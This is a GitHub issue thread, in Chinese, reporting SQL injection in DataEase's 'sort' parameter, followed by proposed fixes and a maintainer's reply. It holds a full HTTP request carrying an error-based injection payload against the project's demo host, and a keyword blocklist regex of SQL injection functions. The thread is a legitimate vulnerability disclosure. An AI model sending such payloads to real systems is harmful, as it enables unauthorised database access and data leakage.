### ISSUE TITLE
[Bug]sort字段存在SQL注入

### ISSUE THREAD

**Issue by strawberrybiscuits** [dataease/dataease#722]
**DataEase 版本**
master

**浏览器版本**
与浏览器版本无关

**Bug 描述**
order by 后面存在sql注入 ，sql注入过滤器不完整，如sleep等仍可以使用
看mapper里有多个文件使用了 ${sort}
**Bug 重现步骤(有截图更好)**
1.
![image](https://user-images.githubusercontent.com/20860589/131290681-93293833-16c5-47ce-8828-dac26b649454.png)
2.
![image](https://user-images.githubusercontent.com/20860589/131290999-59163b37-dfeb-495c-a864-8eea65705928.png)
3.
![image](https://user-images.githubusercontent.com/20860589/131291015-4c2aa475-6047-4d32-bc08-d2c322feecf3.png)

4.
![image](https://user-images.githubusercontent.com/20860589/131291285-4fd9d822-d913-4685-bc3a-b328ddeacea6.png)

数据包
```
POST /template/find HTTP/1.1
Host: demo.dataease.io
Cookie: 省略..
Content-Length: 75
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Accept: application/json, text/plain, */*
Link-Pwd-Token: undefined
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MzAyOTM1MjIsInVzZXJJZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9.a
Accept-Language: zh-CN
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Origin: https://demo.dataease.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.dataease.io/
Accept-Encoding: gzip, deflate
Connection: close

{
	"sort":"extractvalue(rand(),concat(0x3a,substring(version(),1,30)))"
}
```

对应代码：
![image](https://user-images.githubusercontent.com/20860589/131290925-ffa86785-0db1-4fee-84b0-0b2adac0fb82.png)

修复方案：

建议修复方式1:新增拦截规则：
b(select|update|union|and|or|delete|insert|trancate|char|into|substr|ascii|declare|exec|count|master|into|drop|execute|sleep|extractvalue|updatexml|substring|database|concat|rand})

**Comment by strawberrybiscuits** [comment]
2. 使用字典类型校验sort的字段值：
如通过switch(sort){
   case "id":
     ....
      break;
   case "name":
    ...
     break;
   default:
   ...
   break;
}

**Comment by xuwei-fit2cloud** [comment]
非常感谢您的反馈，我们之前的拦截器确实有遗漏的地方，我们尽快修复。
